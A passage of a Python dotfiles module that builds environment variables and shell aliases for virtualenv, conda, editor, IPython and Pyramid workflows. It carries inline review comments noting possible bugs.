        # (without merging ``self.conf``) — confirm before relying on
        # the method's conf-merging behavior.
        self.build = func
        # remove env from the conf dict # XXX
        kwargs.pop('env', None)
        # conf defaults to the remaining kwargs when no conf= was passed
        self.conf = kwargs.get('conf', kwargs)

    @property
    def name(self):
        """
        Returns:
            str: a name for this Step ("<_name> <func name>")
        """
        namestr = getattr(self.func, '__name__', self.func)
        if self._name is not None:
            namestr = "%s %s" % (self._name, namestr)
        return namestr

    @name.setter
    def name(self, value):
        # BUGFIX: the setter function was previously named
        # ``__set_name``, which left the ``name`` property without a
        # setter (``step.name = x`` raised AttributeError).
        self._name = value

    def __str__(self):
        return '<step name=%s>' % (self.name)

    def __repr__(self):
        return '<step name=%s>' % (self.name)

    def _iteritems(self):
        """
        Yields:
            tuple: ('attrname', obj) pairs for name, func, conf
        """
        yield ('name', self.name)
        yield ('func', self.func)
        yield ('conf', self.conf)

    def asdict(self):
        """
        Returns:
            OrderedDict: OrderedDict(self._iteritems())
        """
        return OrderedDict(self._iteritems())

    def build_print_kwargs_env(self, env=None, **kwargs):
        """
        Default ``build_*_env`` Step.func function to print ``env``

        Keyword Arguments:
            env (:py:mod:`Env`): Env object (default: None)
            kwargs (dict): kwargs dict
        Returns:
            :py:mod:`Env`: updated Env
        """
        if env is None:
            env = Env()
        else:
            # Note: StepBuilder also does env.copy before each step
            # making this unnecessary for many build_*_env functions
            env = env.copy()
        env['kwargs'] = kwargs
        output = env.to_json()
        # NOTE(review): ``comment_comment`` is not defined in this
        # module chunk; presumably a comment-prefixing helper
        # (cf. ``prepend_comment_char``) — verify it exists at runtime.
        logevent('build_print_kwargs_env', comment_comment(output))
        env.pop('kwargs', None)
        return env

    DEFAULT_FUNC = build_print_kwargs_env
    func = DEFAULT_FUNC

    def build(self, env=None, **kwargs):
        """
        Call ``self.func(env=env, **self.conf.copy().update(**kwargs))``

        Keyword Arguments:
            env (Env): Env object (default: None)
            kwargs (dict): kwargs dict (overrides ``self.conf`` keys)
        Returns:
            obj: ``self.func(env=env, **self.conf.copy().update(**kwargs))``
        """
        conf = self.conf.copy()
        conf.update(kwargs)  # TODO: verbose merge
        return self.func(env=env, **conf)
class PrintEnvStep(Step):
    """
    Print env and kwargs to stdout
    """
    # step name used in log output
    _name = 'print_env'
    # destination streams (class defaults; see PrintEnvStderrStep)
    stdout = sys.stdout
    stderr = sys.stderr
    # default build function: prints env (see Step.build_print_kwargs_env)
    func = Step.build_print_kwargs_env
class PrintEnvStderrStep(PrintEnvStep):
    """
    Print env and kwargs to stderr
    """
    _name = 'print_env_stderr'
    # NOTE(review): only ``stdout`` is redirected to sys.stderr here;
    # ``stderr`` is inherited unchanged from PrintEnvStep.
    stdout = sys.stderr
class StepBuilder(object):
    """
    A class for building a sequence of steps which modify env
    """

    def __init__(self, **kwargs):
        """
        Keyword Arguments:
            conf (dict): initial configuration dict
                (``show_diffs`` and ``debug`` kwargs overwrite it)
            steps (list): initial list of Step() instances (default: None)
            show_diffs (bool): show diffs of Envs between steps
            debug (bool): show debugging output
        """
        self.steps = kwargs.pop("steps", list())
        self.conf = kwargs.get('conf', OrderedDict())
        self.conf["show_diffs"] = kwargs.get(
            'show_diffs',
            self.conf.get('show_diffs'))
        self.conf["debug"] = kwargs.get('debug', self.conf.get('debug'))
        logevent('StepBuilder %s %s' % (self.name, '__init__'))

    @property
    def name(self):
        # default to the instance id when no _name attribute is set
        return getattr(self, '_name', str(hex(id(self))))

    @property
    def debug(self):
        """
        Returns:
            str: self.conf.get('debug')
        """
        return self.conf.get('debug')

    @property
    def show_diffs(self):
        """
        Returns:
            str: self.conf.get('show_diffs')
        """
        return self.conf.get('show_diffs')

    def add_step(self, func, **kwargs):
        """
        Add a step to ``self.steps``

        Args:
            func (Step or function or str): ``func(env=None, **kwargs)``
            kwargs (dict): kwargs for Step.conf
        Keyword Arguments:
            name (str): function name (default: None)
        Returns:
            :py:mod:`Step`: Step object appended to self.steps
        Raises:
            StepConfigException: when func is not a Step, str, or callable
        """
        if isinstance(func, Step):
            # BUGFIX: a Step instance is not callable; it was previously
            # invoked as ``func(**kwargs)``, which raised TypeError.
            step = func
        elif isinstance(func, STR_TYPES):
            step = PrintEnvStep(name=func)
        elif callable(func):
            step = Step(func, name=kwargs.get('name'), conf=kwargs)
        else:
            raise StepConfigException({
                'func': func,
                'msg': 'func must be a (Step, STR_TYPES, callable)'})
        self.steps.append(step)
        return step

    def build_iter(self, env=None, show_diffs=True, debug=False):
        """
        Build a generator of (Step, Env) tuples from the
        functional composition of StepBuilder.steps
        given an initial :py:mod:`Env` (or None).

        .. code:: python

            # pseudocode
            env_previous = Env()
            for step in self.steps:
                (step, env) = step.build(env=env_previous.copy(), **conf)
                env_previous = env

        Keyword Arguments:
            env (Env): initial Env (default: None)
            show_diffs (bool): show difflib.ndiffs of Envs between steps
                (NOTE(review): this parameter is accepted but the body
                reads ``self.show_diffs`` instead — confirm intent)
            debug (bool): unused here; see :meth:`build`
        Yields:
            tuple: (:py:mod:`Step`, :py:mod:`Env`)
        """
        if env:
            env0 = env
            env = env0.copy()
        else:
            env = Env()
        # label the initial env with a PrintEnvStep
        yield (PrintEnvStep('env0'), env)
        for step in self.steps:
            logevent('BLD %s build %s' % (self.name, step.name),
                     str_center(u" %s " % step.name, 79, '#'),)
            logevent('%s build.conf' % step.name, self.conf, wrap=True)
            logevent('%s step.conf ' % step.name, step.conf, wrap=True)
            logevent('%s >>> %s' % (step.name, hex(id(env))),
                     env, wrap=True)
            # copy so each step sees (and may mutate) its own env;
            # step conf overrides builder conf
            env = env.copy()
            conf = self.conf.copy()
            conf.update(**step.conf)
            new_env = step.build(env=env, **conf)
            logevent('%s >>> %s' % (step.name, hex(id(new_env))),
                     new_env,
                     wrap=True)
            if isinstance(new_env, Env):
                if self.show_diffs and env:
                    diff_output = env.ndiff(new_env)
                    logevent('%s <diff>' % step.name)
                    for line in diff_output:
                        logevent('diff', line.rstrip())
                    logevent('%s </diff>' % step.name)
                yield (step, new_env)
                env = new_env
            else:
                # skip (do not yield) steps that return non-Env values
                logevent("# %r returned %r which is not an Env"
                         % (step.name, new_env))
                logevent('%s stepdict' % step.name, step.__dict__, wrap=True)

    def build(self, *args, **kwargs):
        """
        Build a list of (Step, Env) tuples from
        ``self.build_iter(*args, **kwargs)`` and return the last one.

        Keyword Arguments:
            debug (bool): log.debug each yielded (Step, Env) tuple
        Returns:
            tuple or None: the last ``(Step, Env)`` tuple yielded by
            ``.build_iter`` (None when nothing was yielded)
        """
        debug = kwargs.get('debug', self.debug)
        step_envs = []
        logevent('BLD %s %s' % (self.name, 'build'))
        for step_env in self.build_iter(*args, **kwargs):
            step_envs.append(step_env)
            if debug:
                log.debug(step_env)
        if step_envs:
            return_env = step_envs[-1]
        else:
            return_env = None
        # BUGFIX: previously called ``env.to_json`` (the loop variable)
        # while testing ``hasattr(return_env, 'to_json')``
        logevent('BLD %s %s' % (self.name, 'build-out'),
                 return_env.to_json(indent=2)
                 if hasattr(return_env, 'to_json') else return_env,
                 wrap=True)
        return return_env
def lookup_from_kwargs_env(kwargs, env, attr, default=None):
    """
    Look up ``attr`` in ``kwargs`` first, then ``env``, then ``default``.

    Args:
        kwargs (dict): kwargs dict (highest precedence)
        env (Env): :py:mod:`Env` dict (fallback)
        attr (str): attribute name
        default (obj): value returned when ``attr`` is in neither mapping
    Returns:
        obj: ``kwargs.get(attr, env.get(attr, default))``
    """
    fallback = env.get(attr, default)
    return kwargs.get(attr, fallback)
def build_dotfiles_env(env=None, **kwargs):
    """
    Configure dotfiles base environment (HOME, __WRK, __SRC, __DOTFILES)

    Keyword Arguments:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
        HOME (str): home path (``$HOME``, ``~``)
        __WRK (str): workspace path (``$__WRK``, ``~/-wrk``)
        __SRC (str): path to source repos (``$__WRK/-src``)
        __DOTFILES (str): current dotfiles path (``~/-dotfiles``)
    Returns:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`

    Sets:
        * HOME
        * __WRK
        * __SRC
        * __DOTFILES
    """
    if env is None:
        env = Env()
    # kwargs take precedence over env, then the computed default
    env['HOME'] = kwargs.get(
        'HOME', env.get('HOME', os.path.expanduser('~')))
    env['__WRK'] = kwargs.get(
        '__WRK', env.get('__WRK', get___WRK_default(env)))
    env['__SRC'] = kwargs.get(
        '__SRC', env.get('__SRC', joinpath(env['__WRK'], '-src')))
    env['__DOTFILES'] = kwargs.get(
        '__DOTFILES',
        env.get('__DOTFILES', joinpath(env['HOME'], '-dotfiles')))
    return env
# DEFAULT_WORKON_HOME_DEFAULT (str): name of the env variable whose value
# is used as the default WORKON_HOME (see build_virtualenvwrapper_env)
DEFAULT_WORKON_HOME_DEFAULT = "WORKON_HOME__py27"
def build_virtualenvwrapper_env(env=None, **kwargs):
    """
    Set WORKON_HOME to WORKON_HOME or WORKON_HOME_DEFAULT

    Keyword Arguments:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
        __WRK (str): workspace path (``$__WRK``, ``~/-wrk``)
        WORKON_HOME_DEFAULT (str): variable name (default: ``WORKON_HOME__py27``)
        WORKON_HOME__* (str): path to a WORKON_HOME set
    Returns:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`

    Sets:
        * WORKON_HOME__py27='${__WRK}/-ve27'
        * WORKON_HOME__py34='${__WRK}/-ve34'
        * WORKON_HOME__*=kwargs.get(WORKON_HOME__*)
        * WORKON_HOME_DEFAULT='WORKON_HOME__py27'
    """
    if env is None:
        env = Env()

    def lookup(attr, default=None):
        # kwargs take precedence over env, then the given default
        return lookup_from_kwargs_env(kwargs, env, attr, default=default)

    env['__WRK'] = lookup('__WRK', default=get___WRK_default(env=env))
    env['PROJECT_HOME'] = lookup('PROJECT_HOME',
                                 default=env['__WRK'])  # cdprojecthome cdph
    #env['PYTHON27_ROOT'] = joinpath(env['__WRK'], '-python27')
    env['WORKON_HOME__py27'] = lookup('WORKON_HOME__py27',
                                      default=joinpath(env['__WRK'], '-ve27'))
    #env['PYTHON34_ROOT'] = joinpath(env['__WRK'], '-python34')
    env['WORKON_HOME__py34'] = lookup('WORKON_HOME__py34',
                                      default=joinpath(env['__WRK'], '-ve34'))
    # pass through any additional per-version WORKON_HOME__* kwargs
    for key in kwargs:
        if key.startswith("WORKON_HOME__"):
            env[key] = kwargs.get(key)
    env['WORKON_HOME_DEFAULT'] = lookup('WORKON_HOME_DEFAULT',
                                        default=DEFAULT_WORKON_HOME_DEFAULT)
    # WORKON_HOME defaults to the value of the variable named by
    # WORKON_HOME_DEFAULT (e.g. env['WORKON_HOME__py27'])
    env['WORKON_HOME'] = lookup('WORKON_HOME',
                                default=env.get(env.get('WORKON_HOME_DEFAULT')))
    # cdworkonhome cdwh
    return env
def build_conda_env(env=None, **kwargs):
    """
    Configure conda roots and condaenvs for each supported python
    version (2.7, 3.4, 3.5, 3.6, 3.7) in ``-wrk/-conda*`` and
    ``-wrk/-ce*``.

    Other Parameters:
        __WRK (str): workspace root (``$__WRK``, ``~/-wrk``)
        CONDA_ROOT__py27 (str): path to conda27 root environment
        CONDA_ENVS__py27 (str): path to conda27 envs (e.g. WORKON_HOME)
        CONDA_ROOT__py34 (str): path to conda34 root environment
        CONDA_ENVS__py34 (str): path to conda34 envs (e.g. WORKON_HOME)
    Keyword Arguments:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
    Returns:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
    """
    if env is None:
        env = Env()

    def lookup(attr, default=None):
        return lookup_from_kwargs_env(kwargs, env, attr, default=default)

    env['__WRK'] = lookup('__WRK', default=get___WRK_default(env=env))
    # one conf per supported python version; the original wrote out
    # five near-identical dicts longhand
    confs = [
        dict(
            env_prefix="__py",
            env_suffix=suffix,
            env_root_prefix="-conda",
            env_home_prefix="-ce",
        )
        for suffix in ("27", "34", "35", "36", "37")
    ]
    for conf in confs:
        # e.g. "__py27"
        env_name = "{env_prefix}{env_suffix}".format(**conf)
        # e.g. "-conda27"
        env_root = "{env_root_prefix}{env_suffix}".format(**conf)
        # e.g. "-ce27"
        env_home = "{env_home_prefix}{env_suffix}".format(**conf)
        root_key = "CONDA_ROOT{env_name}".format(env_name=env_name)
        home_key = "CONDA_ENVS{env_name}".format(env_name=env_name)
        env[root_key] = (kwargs.get(root_key, env.get(root_key)) or
                         joinpath(env['__WRK'], env_root))
        env[home_key] = (kwargs.get(home_key, env.get(home_key)) or
                         joinpath(env['__WRK'], env_home))
    return env
# Names of the env variables whose values are used as the default
# CONDA_ROOT and CONDA_ENVS_PATH (see build_conda_cfg_env)
DEFAULT_CONDA_ROOT_DEFAULT = 'CONDA_ROOT__py37'
DEFAULT_CONDA_ENVS_DEFAULT = 'CONDA_ENVS__py37'
def build_conda_cfg_env(env=None, **kwargs):
    """
    Configure CONDA_ROOT / CONDA_ENVS_PATH variables per conda version

    TODO build_venv_config

    Keyword Arguments:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
        CONDA_ROOT__py* (str): per-version conda root path overrides
        CONDA_ENVS__py* (str): per-version conda envs path overrides
        CONDA_ROOT (str): default conda root override
        CONDA_ENVS_PATH (str): default conda envs path override
    Returns:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
    """
    if env is None:
        env = Env()

    def lookup(attr, default=None):
        return lookup_from_kwargs_env(kwargs, env, attr, default=default)

    env['__WRK'] = lookup('__WRK', default=get___WRK_default(env=env))
    conda_envs = [27, 34, 35, 36, 37]
    for n in conda_envs:
        # BUGFIX: the lookup key was previously the literal string
        # 'CONDA_ROOT__py%s % n' (the ``% n`` was inside the quotes),
        # so per-version CONDA_ROOT overrides were never found.
        env['CONDA_ROOT__py%s' % n] = (
            lookup('CONDA_ROOT__py%s' % n,
                   default=joinpath(env['__WRK'], '-conda%s' % n)))
        env['CONDA_ENVS__py%s' % n] = (
            lookup('CONDA_ENVS__py%s' % n,
                   default=joinpath(env['__WRK'], '-ce%s' % n)))
    # the unversioned defaults point at the newest configured version
    env['CONDA_ROOT'] = lookup('CONDA_ROOT',
                               default=env[DEFAULT_CONDA_ROOT_DEFAULT])
    env['CONDA_ENVS_PATH'] = lookup('CONDA_ENVS_PATH',
                                    default=env[DEFAULT_CONDA_ENVS_DEFAULT])
    return env
def build_venv_paths_full_env(env=None,
                              pyver=None,
                              **kwargs):
    """
    Populate ``env`` with the standard FHS-like paths under a venv prefix.

    Keyword Args:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
            (default: None (a new Env()))
        pyver (str): python version string (e.g. "python2.7");
            defaults to :py:func:`get_pyver`
        VENVPREFIX (str): venv prefix path (default: None (VIRTUAL_ENV))
        VENVSTR (str): name of a VIRTUAL_ENV in WORKON_HOME
            or path to a VIRTUAL_ENV (default: None)
        VIRTUAL_ENV (str): path to a VIRTUAL_ENV (default: None)
    Returns:
        env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
    Raises:
        StepConfigException: when neither VENVPREFIX nor VIRTUAL_ENV
            can be determined
    References:
        - https://en.wikipedia.org/wiki/Unix_directory_structure
        - https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard
    """
    env = Env() if env is None else env

    def lookup(attr, default=None):
        return lookup_from_kwargs_env(kwargs, env, attr, default=default)

    if pyver is None:
        pyver = get_pyver(pyver)
    env['VENVPREFIX'] = lookup('VENVPREFIX', default=lookup('VIRTUAL_ENV'))
    env['VENVSTR'] = lookup('VENVSTR')
    env['VENVSTRAPP'] = lookup('VENVSTRAPP')
    env['VIRTUAL_ENV'] = lookup('VIRTUAL_ENV')
    env = Venv.parse_VENVSTR(env=env,
                             pyver=pyver,
                             **kwargs)
    virtual_env = env.get('VIRTUAL_ENV')
    prefix = env.get('VENVPREFIX')
    if prefix in (None, False):
        if virtual_env is None:
            raise StepConfigException(
                {'msg': 'VENVPREFIX or VIRTUAL_ENV must be specified',
                 'env': env.to_json(indent=2),
                 })
        prefix = virtual_env
        env['VENVPREFIX'] = virtual_env
    # (env varname, path components relative to the venv prefix)
    # in the same order as the classic one-assignment-per-line version
    subpath_specs = (
        ('_BIN', ('bin',)),                           # ./bin
        ('_ETC', ('etc',)),                           # ./etc
        ('_ETCOPT', ('etc', 'opt')),                  # ./etc/opt
        ('_HOME', ('home',)),                         # ./home
        ('_LIB', ('lib',)),                           # ./lib
        ('_PYLIB', ('lib', pyver)),                   # ./lib/pythonN.N
        ('_PYSITE', ('lib', pyver, 'site-packages')),  # ./lib/pythonN.N/site-packages
        ('_MNT', ('mnt',)),                           # ./mnt
        ('_MEDIA', ('media',)),                       # ./media
        ('_OPT', ('opt',)),                           # ./opt
        ('_ROOT', ('root',)),                         # ./root
        ('_SBIN', ('sbin',)),                         # ./sbin
        ('_SRC', ('src',)),                           # ./src
        ('_SRV', ('srv',)),                           # ./srv
        ('_TMP', ('tmp',)),                           # ./tmp
        ('_USR', ('usr',)),                           # ./usr
        ('_USRBIN', ('usr', 'bin')),                  # ./usr/bin
        ('_USRINCLUDE', ('usr', 'include')),          # ./usr/include
        ('_USRLIB', ('usr', 'lib')),                  # ./usr/lib
        ('_USRLOCAL', ('usr', 'local')),              # ./usr/local
        ('_USRLOCALBIN', ('usr', 'local', 'bin')),    # ./usr/local/bin
        ('_USRSBIN', ('usr', 'sbin')),                # ./usr/sbin
        ('_USRSHARE', ('usr', 'share')),              # ./usr/share
        ('_USRSRC', ('usr', 'src')),                  # ./usr/src
        ('_VAR', ('var',)),                           # ./var
        ('_VARCACHE', ('var', 'cache')),              # ./var/cache
        ('_VARLIB', ('var', 'lib')),                  # ./var/lib
        ('_VARLOCK', ('var', 'lock')),                # ./var/lock
        ('_LOG', ('var', 'log')),                     # ./var/log
        ('_VARMAIL', ('var', 'mail')),                # ./var/mail
        ('_VAROPT', ('var', 'opt')),                  # ./var/opt
        ('_VARRUN', ('var', 'run')),                  # ./var/run
        ('_VARSPOOL', ('var', 'spool')),              # ./var/spool
        ('_VARTMP', ('var', 'tmp')),                  # ./var/tmp
        ('_WWW', ('var', 'www')),                     # ./var/www
    )
    for varname, parts in subpath_specs:
        env[varname] = joinpath(prefix, *parts)
    return env
def build_venv_paths_cdalias_env(env=None, **kwargs):
    """
    Register :py:class:`CdAlias` entries for the standard venv paths.

    Keyword Args:
        env (Env dict): :py:class:`Env` (default: None (a new Env()))
    Returns:
        env (Env dict): :py:class:`Env` with ``.aliases`` extended.

    .. note:: These do not work in IPython as they run in a subshell.
       See: :py:mod:`dotfiles.venv.venv_ipymagics`.
    """
    if env is None:
        env = Env()
    aliases = env.aliases
    # (alias key, env varname, extra short alias names or None)
    cdalias_specs = (
        ('cdhome', 'HOME', ['cdh']),
        ('cdwrk', '__WRK', None),
        ('cdddotfiles', '__DOTFILES', ['cdd']),
        ('cdprojecthome', 'PROJECT_HOME', ['cdp', 'cdph']),
        ('cdworkonhome', 'WORKON_HOME', ['cdwh', 'cdve']),
        ('cdcondaenvspath', 'CONDA_ENVS_PATH', ['cda', 'cdce']),
        ('cdcondaroot', 'CONDA_ROOT', ['cdr']),
        ('cdvirtualenv', 'VIRTUAL_ENV', ['cdv']),
        ('cdsrc', '_SRC', ['cds']),
        ('cdwrd', '_WRD', ['cdw']),
        ('cdbin', '_BIN', ['cdb']),
        ('cdetc', '_ETC', ['cde']),
        ('cdlib', '_LIB', ['cdl']),
        ('cdlog', '_LOG', None),
        ('cdpylib', '_PYLIB', None),
        ('cdpysite', '_PYSITE', ['cdsitepackages']),
        ('cdvar', '_VAR', None),
        ('cdwww', '_WWW', ['cdww']),
    )
    for aliasname, varname, extra_aliases in cdalias_specs:
        if extra_aliases is None:
            aliases[aliasname] = CdAlias(varname)
        else:
            aliases[aliasname] = CdAlias(varname, aliases=extra_aliases)
    aliases['cdls'] = """set | grep "^cd.*()" | cut -f1 -d" " #%l"""
    aliases['cdhelp'] = """cat ${__DOTFILES}/''scripts/venv_cdaliases.sh | pyline.py -r '^\\s*#+\\s+.*' 'rgx and l'"""
    return env
def build_user_aliases_env(env=None,
                           dont_reflect=False,
                           VIRTUAL_ENV=None,
                           _SRC=None,
                           _ETC=None,
                           _CFG=None,
                           PROJECT_FILES=None,
                           **kwargs):
    """
    Configure env variables and return an OrderedDict of aliases.

    Runs a pipeline of nested ``build_*_env`` step functions
    (editor, IPython, grin, $_WRD, testing, pyramid, supervisord)
    over ``env`` with a :py:class:`StepBuilder`.

    Keyword Args:
        env (Env dict): initial Env (default: None (a new Env()))
        dont_reflect (bool): Whether to always create aliases and functions
            referencing ``$_WRD`` even if ``$_WRD`` doesn't exist.
            (default: False)
        VIRTUAL_ENV (str): path to a VIRTUAL_ENV (overrides env)
        _SRC (str): path to the venv src directory (overrides env)
        _ETC (str): path to the venv etc directory (overrides env)
        _CFG (str): path to the app config file (overrides env)
        PROJECT_FILES (list): files for the ``editp`` alias (overrides env)
    Returns:
        Env: the env produced by the last builder step,
        with ``env.aliases`` extended
    """
    if env is None:
        env = Env()
    aliases = env.aliases
    # explicit keyword args override any values already present in env
    if VIRTUAL_ENV is not None:
        env['VIRTUAL_ENV'] = VIRTUAL_ENV
    if _SRC is not None:
        env['_SRC'] = _SRC
    if _ETC is not None:
        env['_ETC'] = _ETC
    if _CFG is not None:
        env['_CFG'] = _CFG
    if PROJECT_FILES is not None:
        env['PROJECT_FILES'] = PROJECT_FILES
    PROJECT_FILES = env.get('PROJECT_FILES', list())
    env['PROJECT_FILES'] = PROJECT_FILES
    VIRTUAL_ENV = env.get('VIRTUAL_ENV')
    if VIRTUAL_ENV is None:
        VIRTUAL_ENV = ""
        env['VIRTUAL_ENV'] = VIRTUAL_ENV
        logging.debug('VIRTUAL_ENV is none')
        # raise Exception()
    # NOTE(review): for an absolute path, split(os.path.sep)[0] is ''
    # (the first path component), not the basename as parse_VENVSTR
    # uses -- confirm intentional
    VIRTUAL_ENV_NAME = env.get('VIRTUAL_ENV_NAME',
                               VIRTUAL_ENV.split(os.path.sep)[0])
    _SRC = env.get('_SRC')
    if _SRC is None:
        if VIRTUAL_ENV:
            _SRC = joinpath(env['VIRTUAL_ENV'], 'src')
        else:
            _SRC = ""
    env['_SRC'] = _SRC
    _ETC = env.get('_ETC')
    if _ETC is None:
        if VIRTUAL_ENV:
            _ETC = joinpath(env['VIRTUAL_ENV'], 'etc')
        else:
            _ETC = '/etc'
    env['_ETC'] = _ETC
    _APP = env.get('_APP')
    if _APP is None:
        if VIRTUAL_ENV_NAME:
            _APP = VIRTUAL_ENV_NAME
        else:
            _APP = ''
    env['_APP'] = _APP
    _WRD = env.get('_WRD')
    if _WRD is None:
        if _SRC and _APP:
            _WRD = joinpath(env['_SRC'], env['_APP'])
        else:
            _WRD = ""
    env['_WRD'] = _WRD

    def build_editor_env(env):
        # EDITOR configuration
        env['VIMBIN'] = distutils.spawn.find_executable('vim')
        env['GVIMBIN'] = distutils.spawn.find_executable('gvim')
        env['MVIMBIN'] = distutils.spawn.find_executable('mvim')
        # NOTE(review): 'GVIMBIN' was just set (possibly to None), so
        # .get() returns that stored value and the MVIMBIN default is
        # only used if the key were absent -- confirm intended fallback
        env['GUIVIMBIN'] = env.get('GVIMBIN', env.get('MVIMBIN'))
        # set the current vim servername to _APP
        VIMSERVER = '/'
        if _APP:
            VIMSERVER = _APP
        env['VIMCONF'] = "--servername %s" % (
            shell_quote(VIMSERVER).strip('"'))
        if not env.get('GUIVIMBIN'):
            # no GUI vim: edit in the foreground with console vim
            env['_EDIT_'] = "%s -f" % env.get('VIMBIN')
        else:
            env['_EDIT_'] = '%s %s --remote-tab-silent' % (
                env.get('GUIVIMBIN'),
                env.get('VIMCONF'))
        env['EDITOR_'] = env['_EDIT_']
        aliases = env.aliases
        aliases['editw'] = env['_EDIT_']
        aliases['gvimw'] = env['_EDIT_']
        return env

    def build_ipython_env(env):
        # IPYTHON configuration (notebook / qtconsole aliases)
        env['_NOTEBOOKS'] = joinpath(env.get('_SRC',
                                             env.get('__WRK',
                                                     env.get('HOME'))),
                                     'notebooks')
        env['_IPYSESKEY'] = joinpath(env.get('_SRC', env.get('HOME')),
                                     '.ipyseskey')
        # the inline python snippet differs between py2 print statement
        # and py3 print function
        if sys.version_info.major == 2:
            _new_ipnbkey = "print os.urandom(128).encode(\\\"base64\\\")"
        elif sys.version_info.major == 3:
            _new_ipnbkey = "print(os.urandom(128).encode(\\\"base64\\\"))"
        else:
            raise KeyError(sys.version_info.major)
        aliases = env.aliases
        aliases['ipskey'] = ('(python -c \"'
                             'import os;'
                             ' {_new_ipnbkey}\"'
                             ' > {_IPYSESKEY} )'
                             ' && chmod 0600 {_IPYSESKEY};'
                             ' # %l'
                             ).format(
            _new_ipnbkey=_new_ipnbkey,
            _IPYSESKEY=shell_varquote('_IPYSESKEY'))
        aliases['ipnb'] = ('ipython notebook'
                           ' --secure'
                           ' --Session.keyfile={_IPYSESKEY}'
                           ' --notebook-dir={_NOTEBOOKS}'
                           ' --deep-reload'
                           ' %l').format(
            _IPYSESKEY=shell_varquote('_IPYSESKEY'),
            _NOTEBOOKS=shell_varquote('_NOTEBOOKS'))
        env['_IPQTLOG'] = joinpath(env['VIRTUAL_ENV'], '.ipqt.log')
        aliases['ipqt'] = ('ipython qtconsole'
                           ' --secure'
                           ' --Session.keyfile={_IPYSESKEY}'
                           ' --logappend={_IPQTLOG}'
                           ' --deep-reload'
                           #' --gui-completion'
                           #' --existing=${_APP}'
                           ' --pprint'
                           #' --pdb'
                           ' --colors=linux'
                           ' --ConsoleWidget.font_family="Monaco"'
                           ' --ConsoleWidget.font_size=11'
                           ' %l').format(
            _IPYSESKEY=shell_varquote('_IPYSESKEY'),
            _APP=shell_varquote('_APP'),
            _IPQTLOG=shell_varquote('_IPQTLOG'))
        return env

    def build_grin_env(env):
        # grin/grind search aliases scoped to $VIRTUAL_ENV and $_SRC
        aliases = env.aliases
        aliases['grinv'] = 'grin --follow %%l %s' % shell_varquote('VIRTUAL_ENV')
        aliases[
            'grindv'] = 'grind --follow %%l --dirs %s' % shell_varquote('VIRTUAL_ENV')
        aliases['grins'] = 'grin --follow %%l %s' % shell_varquote('_SRC')
        aliases['grinds'] = 'grind --follow %%l --dirs %s' % shell_varquote('_SRC')
        return env

    def build_wrd_aliases_env(env):
        # aliases operating on the working directory $_WRD
        # (only when $_WRD exists, unless dont_reflect from the closure)
        _WRD = env['_WRD']
        aliases = env.aliases
        if os.path.exists(_WRD) or dont_reflect:
            aliases['lsw'] = IpyAlias(
                '(cd {_WRD}; ls $(test -n "{__IS_MAC}" && echo "-G" || echo "--color=auto") %l)'.format(
                    _WRD=shell_varquote('_WRD'),
                    __IS_MAC=shell_varquote('__IS_MAC')),
                name='lsw',
                complfuncstr="""local cur=${2};
                COMPREPLY=($(cd ${_WRD}; compgen -f -- ${cur}));"""
            )
            aliases['findw'] = 'find {_WRD}'.format(
                _WRD=shell_varquote('_WRD'))
            aliases['grepw'] = 'grep %l {_WRD}'.format(
                _WRD=shell_varquote('_WRD'))
            aliases['grinw'] = 'grin --follow %l {_WRD}'.format(
                _WRD=shell_varquote('_WRD'))
            aliases['grindw'] = 'grind --follow %l --dirs {_WRD}'.format(
                _WRD=shell_varquote('_WRD'))
            env['PROJECT_FILES'] = " ".join(
                str(x) for x in PROJECT_FILES)
            aliases['editp'] = "ew ${PROJECT_FILES} %l"
            aliases['makewrd'] = "(cd {_WRD} && make %l)".format(
                _WRD=shell_varquote('_WRD'))
            aliases['makew'] = aliases['makewrd']
            aliases['makewlog'] = (
                "_logfile=\"${_VARLOG}/make.log\"; "
                "(makew %l 2>&1 | tee $_logfile) && e $_logfile")
        else:
            # NOTE(review): this uses ``log.error`` while the sibling steps
            # use ``logging.error`` -- confirm a module-level ``log`` exists
            log.error('app working directory %r not found' % _WRD)
        return env

    def build_python_testing_env(env):
        # python test-runner aliases bound to $_WRD
        aliases = env.aliases
        env['_TESTPY_'] = "(cd {_WRD} && python setup.py test)".format(
            _WRD=shell_varquote('_WRD'),
        )
        aliases['testpyw'] = env['_TESTPY_']
        aliases['testpywr'] = 'reset && %s' % env['_TESTPY_']
        aliases['nosew'] = '(cd {_WRD} && nosetests %l)'.format(
            _WRD=shell_varquote('_WRD'))
        return env

    def build_pyramid_env(env, dont_reflect=True):
        # NOTE(review): this local ``dont_reflect=True`` default shadows
        # (and inverts the default of) the outer ``dont_reflect`` argument
        # -- confirm intentional
        _CFG = joinpath(env['_ETC'], 'development.ini')
        if dont_reflect or os.path.exists(_CFG):
            env['_CFG'] = _CFG
            env['_EDITCFG_'] = "{_EDIT_} {_CFG}".format(
                _EDIT_=env['_EDIT_'],
                _CFG=env['_CFG'])
            # NOTE(review): ``aliases`` here is the *outer* closure variable;
            # the other build_* steps rebind ``aliases = env.aliases``
            aliases['editcfg'] = "{_EDITCFG} %l".format(
                _EDITCFG=shell_varquote('_EDITCFG_'))
            # Pyramid pshell & pserve (#TODO: test -f manage.py (django))
            env['_SHELL_'] = "(cd {_WRD} && {_BIN}/pshell {_CFG})".format(
                _BIN=shell_varquote('_BIN'),
                _CFG=shell_varquote('_CFG'),
                _WRD=shell_varquote('_WRD'))
            env['_SERVE_'] = ("(cd {_WRD} && {_BIN}/pserve"
                              " --app-name=main"
                              " --reload"
                              " --monitor-restart {_CFG})").format(
                _BIN=shell_varquote('_BIN'),
                _CFG=shell_varquote('_CFG'),
                _WRD=shell_varquote('_WRD'))
            aliases['servew'] = env['_SERVE_']
            aliases['shellw'] = env['_SHELL_']
        else:
            logging.error('app configuration %r not found' % _CFG)
            env['_CFG'] = ""
        return env

    def build_supervisord_env(env):
